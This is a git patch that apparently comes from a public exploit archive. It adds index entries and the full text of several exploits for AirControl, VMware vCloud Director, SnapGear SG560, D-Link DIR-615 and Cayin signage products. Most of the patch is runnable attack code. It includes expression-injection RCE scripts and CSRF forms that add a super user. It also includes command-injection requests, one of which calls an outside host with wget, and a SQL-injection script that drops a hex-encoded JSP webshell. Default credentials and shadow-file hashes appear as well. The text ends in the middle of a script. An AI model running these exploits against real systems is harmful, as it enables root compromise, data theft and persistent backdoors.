48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows, +48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, From 533f33f3f4702cb4372efaaba23e3c87dd246c81 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 5 Jun 2020 05:01:53 +0000 Subject: [PATCH 07/17] DB: 2020-06-05 17 changes to exploits/shellcodes IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path AirControl 1.4.2 - PreAuth Remote Code Execution Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) Clinic Management System 1.0 - Unauthenticated Remote Code Execution Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) Oriol Espinal CMS 1.0 - 'id' SQL Injection Clinic Management System 1.0 - Authenticated Arbitrary File Upload Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution Navigate CMS 2.8.7 - Authenticated Directory Traversal D-Link DIR-615 T1 20.10 - CAPTCHA Bypass Online Marriage Registration System 1.0 - Remote Code Execution Cayin Content Management Server 11.0 - Remote Command Injection (root) SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read Cayin Signage Media Player 3.0 - Remote Command Injection (root) Cayin Digital Signage System xPost 2.5 - Remote Command Injection --- exploits/hardware/webapps/48541.py | 30 ++++++ exploits/hardware/webapps/48551.txt | 28 ++++++ exploits/hardware/webapps/48554.txt | 72 ++++++++++++++ exploits/hardware/webapps/48556.txt | 95 +++++++++++++++++++ exploits/java/webapps/48549.py | 138 +++++++++++++++++++++++++++ exploits/multiple/webapps/48553.txt | 139 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48557.py | 130 ++++++++++++++++++++++++++ exploits/multiple/webapps/48558.txt | 121 ++++++++++++++++++++++++ exploits/php/webapps/48542.txt | 20 ++++ exploits/php/webapps/48544.txt | 62 +++++++++++++ exploits/php/webapps/48545.py | 34 +++++++ exploits/php/webapps/48546.txt | 76 +++++++++++++++ exploits/php/webapps/48547.txt | 62 +++++++++++++ exploits/php/webapps/48548.txt | 99 ++++++++++++++++++++ exploits/php/webapps/48550.txt | 29 ++++++ exploits/php/webapps/48552.sh | 52 +++++++++++ exploits/windows/local/48543.txt | 53 +++++++++++ files_exploits.csv | 17 ++++ 18 files changed, 1257 insertions(+) create mode 100755 exploits/hardware/webapps/48541.py create mode 100644 exploits/hardware/webapps/48551.txt create mode 100644 exploits/hardware/webapps/48554.txt create mode 100644 exploits/hardware/webapps/48556.txt create mode 100755 exploits/java/webapps/48549.py create mode 100644 exploits/multiple/webapps/48553.txt create mode 100755 exploits/multiple/webapps/48557.py create mode 100644 exploits/multiple/webapps/48558.txt create mode 100644 exploits/php/webapps/48542.txt create mode 100644 exploits/php/webapps/48544.txt create mode 100755 exploits/php/webapps/48545.py create mode 100644 exploits/php/webapps/48546.txt create mode 100644 exploits/php/webapps/48547.txt create mode 100644 exploits/php/webapps/48548.txt create mode 100644 exploits/php/webapps/48550.txt create mode 100755 exploits/php/webapps/48552.sh create mode 100644 exploits/windows/local/48543.txt diff --git a/exploits/hardware/webapps/48541.py b/exploits/hardware/webapps/48541.py new file mode 100755 index 000000000..ccd4be227 --- /dev/null +++ b/exploits/hardware/webapps/48541.py @@ -0,0 +1,30 @@ +# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution +# Date: 2020-06-03 +# Exploit Author: 0xd0ff9 vs j3ssie +# Vendor Homepage: https://www.ui.com/ +# Software Link: https://www.ui.com/download/#!utilities +# Version: AirControl <= 1.4.2 +# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml + +import requests +import re +import urllib +import sys + + +print """USAGE: python exploit_aircontrol.py [url] [cmd]""" + + +url = sys.argv[1] +cmd = sys.argv[2] + + +burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}" +burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"} +r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False) + +Locat = r.headers["Location"] + +res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1) + +print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res) \ No newline at end of file diff --git a/exploits/hardware/webapps/48551.txt b/exploits/hardware/webapps/48551.txt new file mode 100644 index 000000000..18c04755b --- /dev/null +++ b/exploits/hardware/webapps/48551.txt @@ -0,0 +1,28 @@ +# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass +# Date: 2019-10-12 +# Exploit Author: huzaifa hussain +# Vendor Homepage: https://in.dlink.com/ +# Version: DIR-615 T1 ver:20.10 +# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 +# CVE: CVE-2019-17525 + +D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 + +A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING. + +------------------------------------ +D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new. + +ATTACK SCENARIO AND REPRODUCTION STEPS + +1: Find the ROUTER LoginPage. +2: Fill the required login credentials. +3: Fill the CAPTCH properly and Intercept the request in Burpsuit. +4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab +5: Set the payloads on target variables i.e. username & password under Payloads Tab. +5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab. +6: Now hit the start attack and you will find the correct credentials. + +------------------------------------- + +Huzaifa Hussain \ No newline at end of file diff --git a/exploits/hardware/webapps/48554.txt b/exploits/hardware/webapps/48554.txt new file mode 100644 index 000000000..80412aae7 --- /dev/null +++ b/exploits/hardware/webapps/48554.txt @@ -0,0 +1,72 @@ +# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) +# Author: LiquidWorm +# Date: 2020-06-04 +# Vendor: http://www.securecomputing.com +# CVE: N/A + +Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User + + +Vendor: Secure Computing Corp. +Product web page: http://www.securecomputing.com +Affected version: 3.1.5u1 + +Summary: The SG gateway appliance range provides Internet security and +privacy of communications for small and medium enterprises, and branch +offices. It simply and securely connects your office to the Internet, +and with its robust stateful firewall, shields your computers from +external threats. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. + +Tested on: fnord/1.9 + Apache 1.3.27 (Unix) + Linux 2.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5567 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php + + +14.05.2020 + +-- + + +CSRF Add Super User: +-------------------- + + + +
+ + + + + + + + + + + + + + +
+ + + +Result /etc/shadow: + +root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh +sshd:!!:100:65534::/home:/bin/false +clamav:!!:103:65534::/home:/bin/false +testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh \ No newline at end of file diff --git a/exploits/hardware/webapps/48556.txt b/exploits/hardware/webapps/48556.txt new file mode 100644 index 000000000..241b68a4f --- /dev/null +++ b/exploits/hardware/webapps/48556.txt @@ -0,0 +1,95 @@ +# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: http://www.securecomputing.com +# CVE: N/A + +Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write + + +Vendor: Secure Computing Corp. +Product web page: http://www.securecomputing.com +Affected version: 3.1.5u1 + +Summary: The SG gateway appliance range provides Internet security and +privacy of communications for small and medium enterprises, and branch +offices. It simply and securely connects your office to the Internet, +and with its robust stateful firewall, shields your computers from +external threats. + +Desc: The application allows the currently logged-in user to edit the +configuration files in the system using the CGI executable 'edit_config_files' +in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete) +are located in the /etc/config/ directory. An attacker can manipulate +the POST request parameters to escape from the restricted environment +by using absolute path and start reading, writing and deleting arbitrary +files on the system. + +Tested on: fnord/1.9 + Apache 1.3.27 (Unix) + Linux 2.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5568 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php + + +14.05.2020 + +-- + + +Read: +----- + + +
+ + + + + + +
+ + + + +Write/overwrite/move: +--------------------- + + +
+ + + + + + + + + + +
+ + + + +Delete: +------- + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/java/webapps/48549.py b/exploits/java/webapps/48549.py new file mode 100755 index 000000000..2adda7607 --- /dev/null +++ b/exploits/java/webapps/48549.py @@ -0,0 +1,138 @@ +# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution +# Exploit Author: Tomas Melicher +# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ +# Date: 2020-05-24 +# Vendor Homepage: https://www.vmware.com/ +# Software Link: https://www.vmware.com/products/cloud-director.html +# Tested On: vCloud Director 9.7.0.15498291 +# Vulnerability Description: +# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. + +#!/usr/bin/python + +import argparse # pip install argparse +import base64, os, re, requests, sys +if sys.version_info >= (3, 0): + from urllib.parse import urlparse +else: + from urlparse import urlparse + +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" +session = requests.Session() + +def login(url, username, password, verbose): + target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) + res = session.get(target_url) + match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) + if match: + tenant = match.group(1) + else: + print('[!] can\'t find tenant identifier') + return + + if verbose: + print('[*] tenant: %s'%(tenant)) + + match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) + if match: # Cloud Director 9.* + login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) + res = session.post(login_url, data={'username':username,'password':password}) + if res.status_code == 401: + print('[!] invalid credentials') + return + else: # Cloud Director 10.* + match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) + if match: + login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) + headers = { + 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), + 'Accept': 'application/json;version=29.0', + 'Content-type': 'application/json;version=29.0' + } + res = session.post(login_url, headers=headers) + if res.status_code == 401: + print('[!] invalid credentials') + return + else: + print('[!] url for login form was not found') + return + + cookies = session.cookies.get_dict() + jwt = cookies['vcloud_jwt'] + session_id = cookies['vcloud_session_id'] + + if verbose: + print('[*] jwt token: %s'%(jwt)) + print('[*] session_id: %s'%(session_id)) + + res = session.get(target_url) + match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) + if match is None: + print('[!] organization not found') + return + organization = match.group(1) + if verbose: + print('[*] organization name: %s'%(organization)) + + match = re.search(r'orgId : \'([^\']+)', res.content) + if match is None: + print('[!] orgId not found') + return + org_id = match.group(1) + if verbose: + print('[*] organization identifier: %s'%(org_id)) + + return (jwt,session_id,organization,org_id) + + +def exploit(url, username, password, command, verbose): + (jwt,session_id,organization,org_id) = login(url, username, password, verbose) + + headers = { + 'Accept': 'application/*+xml;version=29.0', + 'Authorization': 'Bearer %s'%jwt, + 'x-vcloud-authorization': session_id + } + admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) + res = session.get(admin_url, headers=headers) + match = re.search(r'\s*([^<\s]+)', res.content, re.IGNORECASE) + if match: + version = match.group(1) + if verbose: + print('[*] detected version of Cloud Director: %s'%(version)) + else: + version = None + print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') + + email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) + + payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) + data = 'false' + data += 'true' + data += 'true' + data += 'false%s25'%(payload) + data += '' + res = session.put(email_settings_url, data=data, headers=headers) + match = re.search(r'value:\s*\[([^\]]+)\]', res.content) + + if verbose: + print('') + try: + print(base64.b64decode(match.group(1))) + except Exception: + print(res.content) + + +parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') +parser.add_argument('-v', action='store_true') +parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) +parser.add_argument('-u', metavar='username', required=True) +parser.add_argument('-p', metavar='password', required=True) +parser.add_argument('-c', metavar='command', help='command to execute', default='id') +args = parser.parse_args() + +url = urlparse(args.t) +exploit(url, args.u, args.p, args.c, args.v) \ No newline at end of file diff --git a/exploits/multiple/webapps/48553.txt b/exploits/multiple/webapps/48553.txt new file mode 100644 index 000000000..adbf9fa72 --- /dev/null +++ b/exploits/multiple/webapps/48553.txt @@ -0,0 +1,139 @@ +# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root) +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A +Cayin Content Management Server 11.0 Root Remote Command Injection + + +Vendor: CAYIN Technology Co., Ltd. +Product web page: https://www.cayintech.com +Affected version: CMS-SE v11.0 Build 19179 + CMS-SE v11.0 Build 19025 + CMS-SE v11.0 Build 18325 + CMS Station (CMS-SE-LXC) + CMS-60 v11.0 Build 19025 + CMS-40 v9.0 Build 14197 + CMS-40 v9.0 Build 14099 + CMS-40 v9.0 Build 14093 + CMS-20 v9.0 Build 14197 + CMS-20 v9.0 Build 14092 + CMS v8.2 Build 12199 + CMS v8.0 Build 11175 + CMS v7.5 Build 11175 + +Summary: CAYIN Technology provides Digital Signage +solutions, including media players, servers, and +software designed for the DOOH (Digital Out-of-home) +networks. We develop industrial-grade digital signage +appliances and tailored services so you don't have +to do the hard work. + +Desc: CAYIN CMS suffers from an authenticated OS +semi-blind command injection vulnerability using +default credentials. This can be exploited to inject +and execute arbitrary shell commands as the root +user through the 'NTP_Server_IP' HTTP POST parameter +in system.cgi page. + +Tested on: Apache/1.3.42 (Unix) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5570 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php + + +15.05.2020 + +--- + + +Session created with default credentials (webadmin:bctvadmin). + +HTTP POST Request: +----------------- + +POST /cgi-bin/system.cgi HTTP/1.1 +Host: 192.168.1.3 +Content-Length: 201 +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Smith +Origin: http://192.168.1.3 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.3/cgi-bin/system.cgi +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957 +Connection: close + + +save_system: 1 +system_date: 2020/5/16 06:36:48 +TIMEZONE: 49 +NTP_Service: 1 +NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk) +TEST_NTP: 測試 +reboot1: 1 +reboot_sel1: 4 +reboot_sel2: 1 +reboot_sel3: 1 +font_list: ZH_TW + + +Request recorder @ ZSL: +----------------------- + +Origin of HTTP request: 192.168.1.3:61347 +HTTP GET request to vrfy.zeroscience.mk: + +GET / HTTP/1.0 +User-Agent: MyVoiceIsMyPassportVerifyMe +Host: vrfy.zeroscience.mk +Accept: */* +Connection: Keep-Alive + + +PoC script: +----------- + +import requests + +url = "http://192.168.1.3:80/cgi-bin/system.cgi" + +cookies = {"cy_lang": "ZH_TW", + "cy_us": "67176fd7d3d05812008", + "cy_en": "c8bef8607e54c99059cc6a36da982f9c009", + "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST", + "WEB_STR_SYSTEM": "SYSTEM_SETTING", + "cy_cgi_tp": "1591206269_15957"} + +headers = {"Cache-Control": "max-age=0", + "Origin": "http://192.168.1.3", + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Smith", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": "http://192.168.1.3/cgi-bin/system.cgi", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close"} + +data = {"save_system": "1", + "system_date": "2020/5/16 06:36:48", + "TIMEZONE": "49", + "NTP_Service": "1", + "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd& + "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6", + "reboot1": "1", + "reboot_sel1": "4", + "reboot_sel2": "1", + "reboot_sel3": "1", + "font_list": "ZH_TW"} + +requests.post(url, headers=headers, cookies=cookies, data=data) \ No newline at end of file diff --git a/exploits/multiple/webapps/48557.py b/exploits/multiple/webapps/48557.py new file mode 100755 index 000000000..31b0ff35a --- /dev/null +++ b/exploits/multiple/webapps/48557.py @@ -0,0 +1,130 @@ +# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root) +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A + +#!/usr/bin/env python3 +# +# +# Cayin Signage Media Player 3.0 Root Remote Command Injection +# +# +# Vendor: CAYIN Technology Co., Ltd. +# Product web page: https://www.cayintech.com +# Affected version: SMP-8000QD v3.0 +# SMP-8000 v3.0 +# SMP-6000 v3.0 Build 19025 +# SMP-6000 v1.0 Build 14246 +# SMP-6000 v1.0 Build 14199 +# SMP-6000 v1.0 Build 14167 +# SMP-6000 v1.0 Build 14097 +# SMP-6000 v1.0 Build 14090 +# SMP-6000 v1.0 Build 14069 +# SMP-6000 v1.0 Build 14062 +# SMP-4000 v1.0 Build 14098 +# SMP-4000 v1.0 Build 14092 +# SMP-4000 v1.0 Build 14087 +# SMP-2310 v3.0 +# SMP-2300 v3.0 Build 19316 +# SMP-2210 v3.0 Build 19025 +# SMP-2200 v3.0 Build 19029 +# SMP-2200 v3.0 Build 19025 +# SMP-2100 v10.0 Build 16228 +# SMP-2100 v3.0 +# SMP-2000 v1.0 Build 14167 +# SMP-2000 v1.0 Build 14087 +# SMP-1000 v1.0 Build 14099 +# SMP-PROPLUS v1.5 Build 10081 +# SMP-WEBPLUS v6.5 Build 11126 +# SMP-WEB4 v2.0 Build 13073 +# SMP-WEB4 v2.0 Build 11175 +# SMP-WEB4 v1.5 Build 11476 +# SMP-WEB4 v1.5 Build 11126 +# SMP-WEB4 v1.0 Build 10301 +# SMP-300 v1.0 Build 14177 +# SMP-200 v1.0 Build 13080 +# SMP-200 v1.0 Build 12331 +# SMP-PRO4 v1.0 +# SMP-NEO2 v1.0 +# SMP-NEO v1.0 +# +# Summary: CAYIN Technology provides Digital Signage +# solutions, including media players, servers, and +# software designed for the DOOH (Digital Out-of-home) +# networks. We develop industrial-grade digital signage +# appliances and tailored services so you don't have +# to do the hard work. +# +# Desc: CAYIN SMP-xxxx suffers from an authenticated +# OS command injection vulnerability using default +# credentials. This can be exploited to inject and +# execute arbitrary shell commands as the root user +# through the 'NTP_Server_IP' HTTP GET parameter in +# system.cgi and wizard_system.cgi pages. +# +# ----------------------------------------------------- +# $ ./cayin.py 192.168.1.2 id +# uid=0(root) gid=65534(guest) +# # start sshd +# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd +# $ +# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'" +# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN +# tcp 0 0 :::22 :::* LISTEN +# $ ./cayin.py 192.168.1.2 "cat /etc/passwd" +# root:x:0:0:root:/root:/bin/bash +# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin +# sshd:x:1000:0::/dev/null:/sbin/nologin +# $ +# ----------------------------------------------------- +# +# Tested on: CAYIN Technology KT-Linux v0.99 +# Apache/1.3.42 (Unix) +# Apache/1.3.41 (Unix) +# PHP/5.2.5 +# Linux 2.6.37 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5569 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php +# +# +# 15.05.2020 +# + +import requests +import sys#____ +import re#_____ + +if len(sys.argv) < 3: + print("Cayin SMP WebManager Post-Auth RCE") + print("Usage: ./cayin.py [ip] [cmd]") + sys.exit(17) +else: + ip____address = sys.argv[1] + ex____command = sys.argv[2] + +ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f" +ur____identif += (bytes(ip____address, "utf-8")) +ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69" +ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72" +ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65" +ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54" +ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50" +ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f" +ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f" +ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c" +ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72" +ur____identif += b"\x67\x25\x32\x36" ##########" +ur____identif += (bytes(ex____command, "utf-8")) +ur____identif += b"\x25\x32\x36" ##############" + +ht____request = requests.get(ur____identif, auth = ("webadmin", "admin")) +re____outputs = re.search("\n(.*)", ht____request.text, flags = re.S).group().strip("\n") +print(re____outputs) \ No newline at end of file diff --git a/exploits/multiple/webapps/48558.txt b/exploits/multiple/webapps/48558.txt new file mode 100644 index 000000000..0e79390d1 --- /dev/null +++ b/exploits/multiple/webapps/48558.txt @@ -0,0 +1,121 @@ +# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A + +#!/usr/bin/env python3 +# +# +# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution +# +# +# Vendor: CAYIN Technology Co., Ltd. +# Product web page: https://www.cayintech.com +# Affected version: 2.5.18103 +# 2.0 +# 1.0 +# +# Summary: CAYIN xPost is the web-based application software, which offers a +# combination of essential tools to create rich contents for digital signage in +# different vertical markets. It provides an easy-to-use platform for instant +# data entry and further extends the usage of CAYIN SMP players to meet users' +# requirements of frequent, daily maintenance. +# +# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability. +# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp +# is not properly sanitised before being returned to the user or used in SQL queries. +# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code +# and execute SYSTEM commands. +# +# -------------------------------------------------------------------------------- +# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888 +# # Injecting... +# # Executing... +# +# Command: whoami +# +# nt authority\system +# +# +# You have a webshell @ http://192.168.2.1:8888/thricer.jsp +# lqwrm@zslab:~$ +# -------------------------------------------------------------------------------- +# +# Tested on: Microsoft Windows 10 Home +# Microsoft Windows 8.1 +# Microsoft Windows Server 2016 +# Microsoft Windows Server 2012 +# Microsoft Windows 7 Ultimate SP1 +# Apache Tomcat/9.0.1 +# MySQL/5.0 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5571 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php +# +# +# 15.05.2020 +# + +import requests as req +import time as vremeto +import sys as sistemot +import re as regularno + +if len(sistemot.argv) < 2: + print("Cayin xPost 2.5 Pre-Auth SQLi RCE") + print("Usage: ./wayfinder.py ip:port") + sistemot.exit(19) +else: + ip = sistemot.argv[1] + +filename = "thricer.jsp" +urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid=" +constr = "-251' UNION ALL SELECT " + +print("# Injecting...") + +cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612" +cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64" +cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0" +cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f" +cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484" +cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c" +cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505" +cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f" +cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657" +cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70" +cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617" +cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050" +cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786" +cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020" +cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757" +cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d" +cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496" +cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561" +cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726" +cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20" +cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746" +cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064" +cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2" +cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a" +cmdjsp += "0a0a" + +columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL " +sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -" +mysqli = constr + cmdjsp + columns + sqlwrite +r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True) +vremeto.sleep(1) + +print("# Executing...") + +r = req.get("http://" + ip + "/" + filename + "?cmd=whoami") +clean = regularno.compile("
(.*)
", flags = regularno.S).search(r.text) +clean = clean.group(1).replace("
